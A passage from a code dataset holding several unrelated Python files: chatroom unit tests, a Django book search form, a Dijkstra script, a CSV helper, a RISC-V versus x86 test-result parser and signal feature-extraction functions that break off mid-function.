\"apple.png\"}\n ]\n\n self.success_get_supported_languages = [\n {\n LANG: {\"languages\": [{\"language_code\": \"af\"}, {\"language_code\": \"sq\"}]},\n RESULT: {\n \"languages\": [{\"language_code\": \"af\"}, {\"language_code\": \"sq\"}]\n },\n },\n {LANG: {\"languages\": []}, RESULT: None},\n ]\n\n self.failure_get_supported_languages = [\n {\n LANG: {\"languages\": [{\"language_code\": \"af\"}, {\"language_code\": \"sq\"}]},\n RESULT: None,\n }\n ]\n\n self.success_bot_image_search = [\n {\n MESSAGE: \"!! image flower\",\n RESPONSE: self.mock_image_search_json,\n RESULT: {\n DATA: \"https://cdn.pixabay.com/photo/2013/10/15/09/12/flower-195893_150.jpg\",\n TYPE: \"img\",\n },\n },\n {\n MESSAGE: \"!! image flower\",\n RESPONSE: self.mock_image_search_json_error,\n RESULT: {DATA: None, TYPE: \"img\"},\n },\n ]\n\n self.failure_bot_image_search = [\n {\n MESSAGE: \"!! image flower\",\n RESPONSE: self.mock_image_search_json,\n RESULT: {DATA: None, TYPE: \"img\"},\n }\n ]\n\n def test_record_message_success(self):\n for test in self.success_record_message:\n with patch(\"sqlalchemy.orm.session.Session.commit\") as commit, patch(\n \"sqlalchemy.orm.session.Session.add\"\n ) as add, patch(\"sqlalchemy.orm.session.Session.close\") as close:\n self.sc.recordMessage(\n test[EMAIL], test[MESSAGE], test[MSG_TYPE], test[DT]\n )\n add.assert_called_once()\n commit.assert_called_once()\n close.assert_called_once()\n\n def test_record_message_failure(self):\n for test in self.failure_record_message:\n with patch(\"sqlalchemy.orm.session.Session.commit\") as commit, patch(\n \"sqlalchemy.orm.session.Session.add\"\n ) as add, patch(\"sqlalchemy.orm.session.Session.close\") as close:\n add.side_effect = SQLAlchemyError()\n self.sc.recordMessage(\n test[EMAIL], test[MESSAGE], test[MSG_TYPE], test[DT]\n )\n add.assert_called_once()\n self.assertRaises(SQLAlchemyError)\n commit.assert_not_called()\n close.assert_called_once()\n\n def test_send_message_success(self):\n for test in self.success_send_message:\n with patch(\"flask_socketio.SocketIO.emit\") as mock_sock:\n self.sc.sendMessage(test[TAG], test[MESSAGE], test[ROOM])\n mock_sock.assert_called_once()\n\n def test_send_message_failure(self):\n for test in self.success_send_message:\n with patch(\"flask_socketio.SocketIO.emit\") as mock_sock:\n mock_sock.side_effect = ConnectionRefusedError\n self.sc.sendMessage(test[TAG], test[MESSAGE], test[ROOM])\n mock_sock.assert_called_once()\n self.assertRaises(ConnectionRefusedError)\n\n def test_update_room_count_success(self):\n for test in self.success_update_room_count:\n with patch(\"server_comms.ServerComms.sendMessage\") as mock_send:\n mock_send.return_value = True\n self.sc.room_count = test[COUNT]\n self.sc.updateRoomCount(test[CHANGE])\n result = self.sc.room_count\n expected = test[RESULT]\n self.assertEqual(result, expected)\n\n def test_received_message(self):\n for test in self.success_received_message:\n with patch(\"server_comms.ServerComms.recordMessage\") as rec_mess, patch(\n \"server_comms.ServerComms.sendMessage\"\n ) as send_mess, patch(\n \"server_comms.ServerComms.chatBotResponse\"\n ) as chat_resp, patch(\n \"helper_functions.determineMessageType\"\n ) as dmt:\n dmt.return_value = test[DATA][MSG_TYPE]\n self.sc.receivedNewMessage(test[DATA])\n dmt.assert_called_once()\n rec_mess.assert_called_once()\n send_mess.assert_called_once()\n chat_resp.assert_called_once()\n\n def test_chatbot_response_success(self):\n for test in self.success_chatbot_response:\n with patch(\"server_comms.ServerComms.recordMessage\") as rec_mess, patch(\n \"server_comms.ServerComms.sendMessage\"\n ) as send_mess, patch(\"bot.Bot.messageRead\") as mess_read:\n mess_read.return_value = test[REPLY]\n self.sc.chatBotResponse(test[MSG], self.chatBot)\n rec_mess.assert_called_once()\n send_mess.assert_called_once()\n\n def test_chatbot_response_failure(self):\n for test in self.failure_chatbot_response:\n with patch(\"server_comms.ServerComms.recordMessage\") as rec_mess, patch(\n \"server_comms.ServerComms.sendMessage\"\n ) as send_mess, patch(\"bot.Bot.messageRead\") as mess_read, patch(\n \"server_comms.ServerComms.createMessage\"\n ) as create_mess, patch(\n \"datetime.datetime\"\n ) as dt:\n mess_read.return_value = test[REPLY]\n dt.now.return_value = test[DT]\n if test[REPLY][TYPE] == None:\n self.sc.chatBotResponse(test[MSG], self.chatBot)\n rec_mess.assert_not_called()\n send_mess.assert_not_called()\n create_mess.assert_not_called()\n elif test[REPLY][DATA] == None:\n self.sc.chatBotResponse(test[MSG], self.chatBot)\n rec_mess.assert_called_once()\n send_mess.assert_called_once()\n create_mess.assert_called_once_with(\n test[ERR_MSG],\n self.chatBot.name,\n self.chatBot.name,\n str(test[DT]),\n \"text\",\n self.chatBot.img,\n )\n\n def query_messages(self, q):\n query = MagicMock()\n if repr(q) == repr(models.Message):\n query.all = mock.Mock(return_value=self.mock_messages)\n elif repr(q) == repr(models.Username):\n query.all = mock.Mock(return_value=self.mock_users)\n return query\n\n def test_on_connect_success(self):\n for test in self.success_on_connect:\n with patch(\"sqlalchemy.orm.session.Session.query\") as query, patch(\n \"sqlalchemy.orm.session.Session.close\"\n ) as close, patch(\n \"server_comms.ServerComms.sendMessage\"\n ) as send_mess, patch(\n \"server_comms.ServerComms.updateRoomCount\"\n ) as update_room:\n query.side_effect = self.query_messages\n self.sc.onConnect(test[SID])\n self.assertEqual(query.call_count, 2)\n close.assert_called_once()\n send_mess.assert_called_once()\n update_room.assert_called_once()\n\n def checkIfUser(self, user):\n filter_mock = MagicMock()\n email = user.get_children()[1].value\n for user in self.mock_users:\n if user.email == email:\n filter_mock.first.return_value = True\n return filter_mock\n filter_mock.first.return_value = None\n return filter_mock\n\n def test_check_if_users_exists_success(self):\n for test in self.success_check_if_user_exists:\n with patch(\"sqlalchemy.orm.session.Session\") as sessLocal:\n sessLocal.return_value.query.return_value.filter.side_effect = (\n self.checkIfUser\n )\n result = hf.checkIfUserExists(sessLocal, test[EMAIL])\n expected = test[RESULT]\n self.assertEqual(result, expected)\n\n def test_check_if_users_exists_failure(self):\n for test in self.failure_check_if_user_exists:\n with patch(\"sqlalchemy.orm.session.Session\") as sessLocal:\n sessLocal.return_value.query.side_effect = SQLAlchemyError()\n hf.checkIfUserExists(sessLocal, test[EMAIL])\n self.assertRaises(SQLAlchemyError)\n\n def test_create_user_entry_success(self):\n for test in self.success_create_user_entry:\n with patch(\"sqlalchemy.orm.session.Session\") as sessLocal:\n hf.createNewUserEntry(sessLocal, test[EMAIL], test[NAME], test[IMG])\n sessLocal.return_value.add.assert_called_once()\n sessLocal.return_value.commit.assert_called_once()\n sessLocal.return_value.close.assert_called_once()\n\n def test_get_supported_languages_success(self):\n for test in self.success_get_supported_languages:\n with patch(\"google.cloud.translate.\" \"TranslationServiceClient\") as client:\n client.get_supported_languages.return_value.languages = test[LANG][\n \"languages\"\n ]\n client.get_supported_languages.return_value.values = test[LANG]\n result = bhf.getSupportedLanguages(client, 1)\n if result != None:\n result = result.values\n expected = test[RESULT]\n self.assertEqual(result, expected)\n\n def test_get_supported_languages_failure(self):\n for test in self.failure_get_supported_languages:\n with patch(\"google.cloud.translate.\" \"TranslationServiceClient\") as client:\n client.get_supported_languages.side_effect = Exception()\n result = bhf.getSupportedLanguages(client, 1)\n expected = test[RESULT]\n self.assertEqual(result, expected)\n self.assertRaises(Exception)\n\n def test_bot_image_search_success(self):\n for test in self.success_bot_image_search:\n with patch(\"bot.requests\") as requests, patch(\"bot.random\") as random:\n random.randint.return_value = 0\n requests.get.return_value.value = test[RESPONSE]\n requests.get.return_value.json.return_value = (\n requests.get.return_value.value\n )\n result = self.chatBot.messageRead(test[MESSAGE])\n expected = test[RESULT]\n self.assertDictEqual(result, expected)\n\n def test_bot_image_search_failure(self):\n for test in self.failure_bot_image_search:\n with patch(\"bot.requests\") as requests, patch(\"bot.random\") as random:\n random.randint.return_value = 0\n requests.get.side_effect = Exception()\n result = self.chatBot.messageRead(test[MESSAGE])\n expected = test[RESULT]\n self.assertDictEqual(result, expected)\n self.assertRaises(Exception)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"sb989/Chatroom_Project","sub_path":"tests/mocked_unit_tests.py","file_name":"mocked_unit_tests.py","file_ext":"py","file_size_in_byte":17142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"294521270","text":"from django import forms\nfrom haystack.forms import SearchForm\nimport re\nfrom pyaws import ecs\nimport settings\n\nclass BookSearchForm(SearchForm):\n def __init__(self, *args, **kwargs):\n super(BookSearchForm, self).__init__(*args, **kwargs)\n self.ISBN = None\n self.title = None\n \n def search(self):\n \"\"\"\n Does actual search.\n \n Returns a two element tuple. First one is the site search results. Second is amazon results.\n \"\"\"\n \n query = self.cleaned_data['q']\n self.title = query\n \n if self.is_valid():\n local_books_title = self.searchqueryset.auto_query(self.title)\n local_books_query = self.searchqueryset.auto_query(query)\n \n local_books = local_books_query\n # if title query returned more results make that local_books\n if len(local_books_title) > len(local_books_query):\n local_books = local_books_title\n \n return local_books\n else:\n return None\n \n def is_query_ISBN(self):\n \"\"\"\n Returns True if query is an ISBN number, otherwise False.\n Also sets self.ISBN to be just the plain number.\n \"\"\"\n query = self.cleaned_data['q']\n \n # ISBN can contain: numbers, spaces, tabs, x or X, dashes, and underscores.\n if re.search(r'[^0-9 \\txX\\-_]', query):\n return False\n else:\n self.ISBN = re.sub(r'[^0-9xX]', '', query)\n return True\n ","repo_name":"hgezim/GizmoBooks","sub_path":"src/gizmolab/search/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74772422546","text":"from sys import stdin\nimport numpy as np\n\nN = int(stdin.readline().rstrip())\nX = [[int(x) for x in stdin.readline().rstrip().split()] for _ in range(N)]\n\ninf = 10 ** 7\nadjacent_array = np.full((N, N), inf)\nd = np.full(N, inf)\ncolor = ['white'] * N\np = np.zeros(N)\nmincost = inf\n\nfor k in range(N):\n for l in [2 * x + 3 for x in range(int((len(X[k]) - 2) / 2))]:\n adjacent_array[k][X[k][l - 1]] = X[k][l]\n\n\ndef dijkstra(s):\n d[s] = 0\n p[s] = -1\n u = 0\n global mincost\n\n while True:\n mincost = inf\n for i in range(N):\n if (color[i] != 'black') & (d[i] < mincost):\n mincost = d[i]\n u = i\n if mincost == inf:\n break\n print(str(u) + ' ' + str(mincost))\n color[u] = 'black'\n for v in range(N):\n if (color[v] != 'black') & (adjacent_array[u][v] < inf):\n if d[u] + adjacent_array[u][v] < d[v]:\n d[v] = d[u] + adjacent_array[u][v]\n p[v] = u\n color[v] = 'gray'\n\n\ndijkstra(0)\n","repo_name":"KouheiFurukawa/atcoder-back-number","sub_path":"dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27150378226","text":"\"\"\"\t\nMacaque Simulation Project\nAdeesha Ekanayake \n5/12/2013\n\ncommon.py\n---------\nCommon methods\n\"\"\"\n\ndef read_CSV(inputValue):\n\t\"\"\"\n\treads passed in string in csv format into an array of values. Deals with\n\tpossibility of csv values in an excel cell\n\n\tparameters\n\t----------\n\tinputString: raw input string. Can be 1 value or multiple values\n\n\treturns\n\t-------\n\tarray of elements\n\t\"\"\"\n\tif inputValue == '':\n\t\treturn []\n\n\telif isinstance(inputValue, basestring): \n\n\t\t#make sure input is not empty cell\n\t\tsplit_array = inputValue.split(',')\n\n\t\t#if int(x) was used instead of int(float(x)) a valueError is thrown\n\t\tint_array = [int(float(x)) for x in split_array] \n\n\telse:\n\t\tint_array = []\n\t\tint_array.append(int(inputValue)) #make it int to keep type consistent\n\n\treturn int_array\n\n\n","repo_name":"adeeshaek/primate-social-network","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"15920166296","text":"import os , json , csv\nimport result_parser\nimport combination_parser\n\nclass testRes():\n def __init__(self , workingDir , curCsv=None):\n self.workingDir = workingDir\n self.logsDir = workingDir + '/logs'\n self.failedLogsDir = workingDir + '/logs_failed'\n self.suite2casesDir = workingDir + '/suite2cases_out'\n self.testResult = []\n self.curCsv = None\n if curCsv is not None:\n if curCsv[0] != '/':\n curCsv = os.path.join('.' , curCsv)\n if os.path.exists(curCsv):\n self.csvtestResult = {}\n self.curCsv = curCsv\n self.totalCaseNum, self.totalPassedCaseNum, self.totalFailedCaseNum = 0, 0, 0\n\n def resPick(self):\n allSuites = os.listdir(self.logsDir)\n withFailedSuites = os.listdir(self.failedLogsDir)\n for suite in allSuites:\n if suite not in withFailedSuites:\n for case in os.listdir(self.logsDir+'/'+suite):\n if self.csvtestResult.get(case , None) is not None and self.csvtestResult[case]['status'] == 'success':\n self.testResult.append({'suite name':suite , 'case name':case , 'status':'success' , 'reason':self.csvtestResult[case]['reason']})\n else:\n self.testResult.append({'suite name':suite , 'case name':case , 'status':'success'})\n \n \n\n def csvRead(self):\n if self.curCsv is not None:\n with open(self.curCsv , 'r') as f:\n rows = csv.reader(f)\n rows = [row for row in rows]\n rows = rows[1:]\n keys = ['suite name' , 'case name' , 'status' , 'logFile' , 'reason']\n for row in rows:\n self.csvtestResult[row[1]] = dict(zip(keys , row))\n\n def exprotToCsv(self, filename = 'failureCause.csv'):\n csvfile = open('./'+filename,'w')\n cw = csv.writer(csvfile,lineterminator = '\\n')\n title = ['测试套/软件包名','测试用例名','状态','日志文件','原因']\n row = []\n row.append(title)\n ran = range(len(self.testResult))\n suite = ''\n for i in ran:\n if len(row) == 1 or suite != self.testResult[i]['suite name']:\n suiteName = self.testResult[i]['suite name']\n else:\n suiteName = ''\n if self.testResult[i]['suite name'] != '':\n suite = self.testResult[i]['suite name']\n if self.testResult[i].get('reason' , None) is not None:\n reason = self.testResult[i]['reason']\n elif self.testResult[i]['status'] == 'x86 fail':\n reason = 'x86 fail'\n elif self.testResult[i]['status'] == 'success':\n reason = 'None'\n else:\n reason = ''\n logfile = sorted(os.listdir(self.logsDir+'/'+suite+'/'+self.testResult[i]['case name']))[0]\n logPath = self.logsDir+'/'+suite+'/'+self.testResult[i]['case name']+'/'+logfile\n row.append([suiteName , self.testResult[i]['case name'] , self.testResult[i]['status'] , logPath , reason])\n cw.writerows(row)\n csvfile.close()\n\n def exportToMarkdown(self , filename = 'table.md'):\n with open(filename, \"w\") as md_file:\n title = ['测试套/软件包名','测试用例名','状态','日志文件','原因']\n md_file.write(\"| \")\n for header in title:\n md_file.write(header + \" | \")\n md_file.write(\"\\n\")\n md_file.write(\"| \")\n for header in title:\n md_file.write(\":---: | \")\n md_file.write(\"\\n\")\n ran = range(len(self.testResult))\n step = -1\n suite = ''\n for i in ran:\n if self.testResult[i]['suite name'] != '':\n suite = self.testResult[i]['suite name']\n if (i+step < 0 or i+step >= len(self.testResult)) or self.testResult[i+step]['suite name'] != self.testResult[i]['suite name']:\n suiteName = self.testResult[i]['suite name']\n else:\n suiteName = ''\n if self.testResult[i].get('reason' , None) is not None:\n reason = self.testResult[i]['reason']\n elif self.testResult[i]['status'] == 'success' :\n reason = 'None'\n elif self.testResult[i]['status'] == 'x86 fail':\n reason = 'x86 fail'\n else:\n reason = ''\n logfile = sorted(os.listdir(self.logsDir+'/'+suite+'/'+self.testResult[i]['case name']))[0]\n logPath = self.logsDir+'/'+suite+'/'+self.testResult[i]['case name']+'/'+logfile\n md_file.write('| '+suiteName+' | '+self.testResult[i]['case name']+' | '+self.testResult[i]['status']+' | ['+logPath+']('+logPath+') | '+reason+' |\\n')\n\n \n def statNum(self):\n self.totalCaseNum = len(self.testResult)\n for case in self.testResult:\n if case['status'] == 'success':\n self.totalPassedCaseNum += 1\n self.totalFailedCaseNum = self.totalCaseNum - self.totalPassedCaseNum\n\n \n\n\ndef findRealFail(riscv:testRes , x86:testRes):\n riscvFailedSuite = os.listdir(riscv.failedLogsDir)\n x86FailedSuite = os.listdir(x86.failedLogsDir)\n x86Suite = os.listdir(x86.logsDir)\n module = testRes('mugen-riscv')\n command = testRes('mugen-riscv')\n suite = ''\n retest = combination_parser.combination()\n for suite in riscvFailedSuite:\n for case in os.listdir(riscv.logsDir+'/'+suite):\n if case not in os.listdir(riscv.failedLogsDir+'/'+suite):\n if riscv.csvtestResult.get(case , None) is not None and riscv.csvtestResult[case]['status'] == 'success':\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'success' , 'reason':riscv.csvtestResult[case]['reason']})\n else:\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'success'})\n if suite not in x86FailedSuite:\n for case in os.listdir(riscv.failedLogsDir+'/'+suite):\n if case not in x86Suite:\n if riscv.csvtestResult.get(case , None) is not None:\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'fail_x86NotTest' , 'reason':riscv.csvtestResult[case]['reason']})\n else:\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'fail_x86NotTest'})\n else: \n if riscv.csvtestResult.get(case , None) is not None:\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'fail' , 'reason':riscv.csvtestResult[case]['reason']})\n else:\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'fail'})\n else:\n for case in os.listdir(riscv.failedLogsDir+'/'+suite):\n if case in os.listdir(x86.failedLogsDir+'/'+suite):\n if riscv.csvtestResult.get(case , None) is not None and riscv.csvtestResult[case]['status'] == 'x86 fail':\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'x86 fail' , 'reason':riscv.csvtestResult[case]['reason']})\n else:\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'x86 fail'})\n for case in os.listdir(riscv.failedLogsDir+'/'+suite):\n if case not in os.listdir(x86.failedLogsDir+'/'+suite):\n reason = None\n fileData = None\n fliter = result_parser.classifier('catalog.json')\n logfile = sorted(os.listdir(riscv.logsDir+'/'+suite+'/'+case))[0]\n with open(riscv.logsDir+'/'+suite+'/'+case+'/'+logfile , 'r' , encoding=\"ISO-8859-1\") as f:\n fileData = f.read().split('\\n')\n if riscv.csvtestResult.get(case , None) is not None:\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'fail' , 'reason':riscv.csvtestResult[case]['reason']})\n reason = riscv.csvtestResult[case].get('reason' , [])\n else:\n reason = fliter.checkErrorType(fileData)\n riscv.testResult.append({'suite name':suite , 'case name':case , 'status':'fail' , 'reason':'/'.join(reason)})\n if 'timeout' in reason:\n retest.add_case(suite , case)\n if 'kernel module absent' in reason:\n for line in fileData:\n if line.find('Module') != -1:\n module.testResult.append({'suite name':suite , 'case name':case , 'status':'fail' , 'reason':line})\n break\n if 'file missing' in reason or 'preinstall absent' in reason :\n retest.add_case(suite , case)\n for line in fileData:\n if line.find('command not found') != -1 or line.find('.service not found') != -1 or line.find('No such file or directory') != -1:\n command.testResult.append({'suite name':suite , 'case name':case , 'status':'fail' , 'reason':line})\n \n \n module.exprotToCsv('module_failure.csv')\n command.exprotToCsv('command.csv')\n retest.export_every_json()\n\n\n\nif __name__ == '__main__':\n riscv = testRes('./mugen-riscv' , 'failureCause.csv')\n x86 = testRes('./mugen-x86')\n riscv.resPick()\n riscv.csvRead()\n findRealFail(riscv , x86)\n riscv.exprotToCsv()\n riscv.exportToMarkdown()","repo_name":"KotorinMinami/res_list","sub_path":"res_list.py","file_name":"res_list.py","file_ext":"py","file_size_in_byte":10007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13300786944","text":"import numpy as np\nimport pickle\nimport sys\n# import os\n# os.chdir('C:/Users/tbapt/Desktop/Documents/Ecole/3A/Machine_learning/DREEM_PROJECT')\n\n## Auxiliary functions\ndef meanOfInterval(signal, freq_min, freq_max):\n return np.average(signal[freq_min:freq_max])\n \ndef buildIntervals(list_length, interval_width):\n return list([i, i+interval_width] for i in range(0,list_length,interval_width))\n\ndef mobilMean(signal , interval_width): #use an odd number as interval_width, otherwise the width will be interval_width + 1.\n # side_interval = interval_width//2\n # return list( np.average( signal[ max(i-side_interval , 0) : min( i+side_interval+1 , len(signal))]) for i in range(len(signal)) )\n cumsum = np.cumsum(np.insert(signal, 0, 0)) \n return (cumsum[interval_width:] - cumsum[:-interval_width]) / float(interval_width)\n\n\n## methodOne(s) : feature-extraction methods\n\ndef distanceMinMaxOne( list_freq = None , param = None , rep_dim_feature_per_signal = False): # param = [ interval_width ]\n # Returns the sum of distances betwwen the minimum and the maximum on a given set of intervals. Intended to be used with the temporal signal\n if rep_dim_feature_per_signal:\n return 1\n interval_width, = param\n i_max = len(list_freq)//interval_width\n return [ sum( np.linalg.norm( np.array([np.argmax(list_freq[i*interval_width:(i+1)*interval_width]) , max(list_freq[i*interval_width:(i+1)*interval_width])]) - np.array( [np.argmin(list_freq[i*interval_width:(i+1)*interval_width]) , min(list_freq[i*interval_width:(i+1)*interval_width])]) ) for i in range(i_max) ) ] \n\ndef maxAmpOne(list_freq = None, param = None , rep_dim_feature_per_signal = False): # param useless\n # Returns the maximum amplitude of a list of frequencies\n if rep_dim_feature_per_signal:\n return 1\n return [max(list_freq)]\n\n\ndef freqMinLimitAmpOne(list_freq = None, param = None , rep_dim_feature_per_signal = False): # param = [amp_lim]\n # Returns the (minimum) frequency above which all frequencies have amplitude < amp_lim = param[0]\n if rep_dim_feature_per_signal:\n return 1\n \n amp_lim, = param\n normalized_list_freq = 1/max(abs(list_freq))*list_freq\n for i in range(len(normalized_list_freq)-1,-1,-1):\n if normalized_list_freq[i] > amp_lim:\n return [i+1]\n return [0]\n\n\n\ndef nbPikesOne(list_freq = None, param = None , rep_dim_feature_per_signal = False ): #param = [interval_width, amp_lim]\n # Returns the number of frequency pikes for a given (amp_lim) amplitude, averaging with a mobile mean\n if rep_dim_feature_per_signal:\n return 1\n interval_width, amp_lim = param\n mobil_mean_list_freq = mobilMean(list_freq , interval_width)\n mobil_mean_list_freq = 1/max(abs(mobil_mean_list_freq))*mobil_mean_list_freq\n nb_pikes = 0\n # is_interval_in_a_pike = [False , False]\n # for i in range(len(mobil_mean_list_freq)):\n # if mobil_mean_list_freq[i] > amp_lim:\n # is_interval_in_a_pike = [True , is_interval_in_a_pike[0] ]\n # else:\n # is_interval_in_a_pike = [False , is_interval_in_a_pike[0] ]\n # if not(is_interval_in_a_pike[1]) and is_interval_in_a_pike[0]:\n # nb_pikes+=1\n \n is_interval_in_a_pike = 4 #code : 1 = [T,T] , 2 = [T,F] , 3 = [F,T] , 4 = [F,F]\n for i in range(len(mobil_mean_list_freq)):\n if mobil_mean_list_freq[i] > amp_lim:\n is_interval_in_a_pike = 1 if is_interval_in_a_pike in [1,2] else 2\n else:\n is_interval_in_a_pike = 3 if is_interval_in_a_pike in [1,2] else 4\n if is_interval_in_a_pike==2:\n nb_pikes+=1\n return [nb_pikes]\n\n\ndef nbPikesFastOne(list_freq = None, param = None , rep_dim_feature_per_signal = False ): #param = [interval_width, amp_lim]\n # Returns the number of frequency pikes for a given (amp_lim) amplitude, averaging over an interval\n if rep_dim_feature_per_signal:\n return 1\n interval_width, amp_lim = param\n intervals = buildIntervals(len(list_freq), interval_width)\n normalized_list_freq = 1/max(abs(list_freq))*list_freq\n nb_pikes = 0\n is_interval_in_a_pike = [False , False]\n # for minim, maxim in intervals:\n # mean_value = meanOfInterval(list_freq, minim, maxim)\n # if mean_value > amp_lim:\n # is_interval_in_a_pike = [True , is_interval_in_a_pike[0] ]\n # else:\n # is_interval_in_a_pike = [False , is_interval_in_a_pike[0] ]\n # if not(is_interval_in_a_pike[1]) and is_interval_in_a_pike[0]:\n # nb_pikes+=1\n \n is_interval_in_a_pike = 4 #code : 1 = [T,T] , 2 = [T,F] , 3 = [F,T] , 4 = [F,F]\n for minim, maxim in intervals:\n mean_value = meanOfInterval(normalized_list_freq, minim, maxim)\n if mean_value > amp_lim:\n is_interval_in_a_pike = 1 if is_interval_in_a_pike in [1,2] else 2\n else:\n is_interval_in_a_pike = 3 if is_interval_in_a_pike in [1,2] else 4\n if is_interval_in_a_pike==2:\n nb_pikes+=1\n return [nb_pikes]\n\n\ndef indexMaxAmpOne(list_freq = None , param = None , rep_dim_feature_per_signal = False): # param = [ interval_width ]\n # Give the index of maximum amplitude, for the data averaged with a mobile mean of size interval_width\n if rep_dim_feature_per_signal:\n return 1\n interval_width, = param\n mobil_mean_list_freq = mobilMean(list_freq , interval_width)\n return [np.argmax(mobil_mean_list_freq)]\n\ndef indexMaxAmpFastOne(list_freq = None , param = None , rep_dim_feature_per_signal = False): # param = [ interval_width ]\n # Give the index of maximum amplitude, for the data averaged over fixed intervals. Probably way faster than indexMaxAmpOne, though less accurate.\n if rep_dim_feature_per_signal:\n return 1\n interval_width, = param\n i_max = len(list_freq)//interval_width\n #side_interval = interval_width//2\n list_mean = list( np.average( list_freq[i*interval_width:(i+1)*interval_width]) for i in range(i_max) )\n return [ np.argmax(list_mean)*interval_width + interval_width//2 ]\n\n\ndef meanDiffNeighbOne(list_freq = None , param = None , rep_dim_feature_per_signal = False): #param = [interval_width] (for moving mean\n # Returns the average of absolute difference of amplitude between all neighbours frequencies\n if rep_dim_feature_per_signal:\n return 1\n \n interval_width, = param\n moving_mean_list = mobilMean(list_freq , interval_width) if interval_width>1 else list_freq.copy()\n return [np.average(list(abs(moving_mean_list[i+1]-moving_mean_list[i]) for i in range(len(moving_mean_list)-1)))]\n\n\n \ndef stdDeviationNbOne(list_freq = None , param = None , rep_dim_feature_per_signal = False ): #param = [ n_nb ]\n # Returns the average of standard deviations computed on a given number of points (separation of x-axis in intervals of the same length)\n if rep_dim_feature_per_signal:\n return 1\n n_nb, = param\n c_max = len(list_freq)//n_nb\n return [np.average(list(np.std(list_freq[c*n_nb:(c+1)*n_nb]) for c in range(c_max)))]\n\n \ndef upperRightOne(list_freq = None , param = None , rep_dim_feature_per_signal = False): # param = [th_amp , th_freq]\n # Returns a boolean, True iff there is a point in the upper right corner, defined by the parameters\n # Consider returning TRUE iff there are more than a given number of points in the upper right corner\n if rep_dim_feature_per_signal:\n return 1\n \n normalized_list_freq = 1/max(abs(list_freq))*list_freq\n th_amp , th_freq = param\n index_th_freq = int(th_freq*(len(list_freq)-1))\n \n \n return([len(([amp for amp in normalized_list_freq[index_th_freq:] if amp > th_amp]))])\n \n #return [max(normalized_list_freq[index_th_freq:-1])>th_amp]\n\ndef meanOne(list_time = None , param = None , rep_dim_feature_per_signal = False): # param is useless\n # Returns the mean of the signal\n if rep_dim_feature_per_signal:\n return 1\n return [np.mean(list_time)]\n\ndef meanOfAbsOne(list_time = None , param = None , rep_dim_feature_per_signal = False): # param is useless\n # Returns the mean of the signal's absolute value\n if rep_dim_feature_per_signal:\n return 1\n\n return [np.mean(np.abs(list_time))]\n \ndef maxOfAbsOne(list_time = None , param = None , rep_dim_feature_per_signal = False): # param is useless\n # Returns the mean of the signal's absolute value\n if rep_dim_feature_per_signal:\n return 1\n\n return [np.max(np.abs(list_time))]\n\ndef minOfAbsOne(list_time = None , param = None , rep_dim_feature_per_signal = False): # param is useless\n # Returns the mean of the signal's absolute value\n if rep_dim_feature_per_signal:\n return 1\n\n return [np.min(np.abs(list_time))]\n\n'''def methodTestOne(list_freq = None, param = None, rep_dim_feature_per_signal = False): # param useless\n # Pointless method to test extractFeatureAll\n if rep_dim_feature_per_signal:\n return 2\n \n return np.array([1,2])'''\n\n## Global feature-extraction methods\n \ndef extractFeatureAll(h5file_freq , methodOne , param , list_bool_extract_signal):\n # Method giving the design matrix of h5file, given a certain method\n # list_bool_extract_signal[i] contains 1 iff the ith signal (data field) must have its feature extracted for this methodOne. Must be of length : len(key_list)\n key_list = list(h5file_freq.keys())\n key_list_extract = list( key_list[i] for i in range(len(key_list)) if list_bool_extract_signal[i] )\n nb_samples = len(h5file_freq[key_list[0]])\n dim_feature_per_signal = methodOne(rep_dim_feature_per_signal = True)\n rep = np.zeros((nb_samples , len(key_list_extract)*dim_feature_per_signal))\n \n for k_id in range(len(key_list_extract)):\n k=key_list_extract[k_id]\n rep[: ,k_id*dim_feature_per_signal:(k_id+1)*dim_feature_per_signal ] = np.array( list(methodOne(h5file_freq[k][i] , param) for i in range(nb_samples) ))\n return rep\n\ndef extractMultiFeatureAll(h5file_freq , list_methodOne , list_param , mat_bool_extract_signal , save = False , name_save = None):\n # Returns the concatenation of design matrices for a list of methods\n # mat_bool_extract_signal[i] (ith row) contains list_bool_extract_signal for extractFeatureAll function. IE : mat_bool_extract_signal[i,j] is 1 iff for ith methodOne, jth signal must have its feature extracted. \n # mat_bool_extract_signal must be of size : (nb of methodOnes , len(key_list) )\n key_list = list(h5file_freq.keys())\n nb_samples = len(h5file_freq[list(h5file_freq.keys())[0]])\n #sum_dim_feature_per_signal = sum( methodOne(rep_dim_feature_per_signal = True) for methodOne in list_methodOne )\n \n list_key_list_extract = list( list( key_list[j] for j in range(len(key_list)) if mat_bool_extract_signal[i,j] ) for i in range(len(list_methodOne)) )\n \n sum_weighted_dim_feature_per_signal = sum( list_methodOne[i](rep_dim_feature_per_signal = True)*len(list_key_list_extract[i]) for i in range(len(list_methodOne)) )\n \n rep = np.zeros((nb_samples , sum_weighted_dim_feature_per_signal ))\n \n c = 0\n i = 0\n \n # setup toolbar\n print(\"Progress...\")\n sys.stdout.write(\"|\"+(\"_\" * len(list_methodOne)) + \"_|\\n\")\n sys.stdout.flush()\n sys.stdout.write(\"|>\")\n sys.stdout.flush()\n \n for methodOne in list_methodOne :\n \n # update the bar\n sys.stdout.write(\"\\b\")\n sys.stdout.write(\"=>\")\n sys.stdout.flush()\n \n temp = len(list_key_list_extract[i])*methodOne(rep_dim_feature_per_signal = True)\n 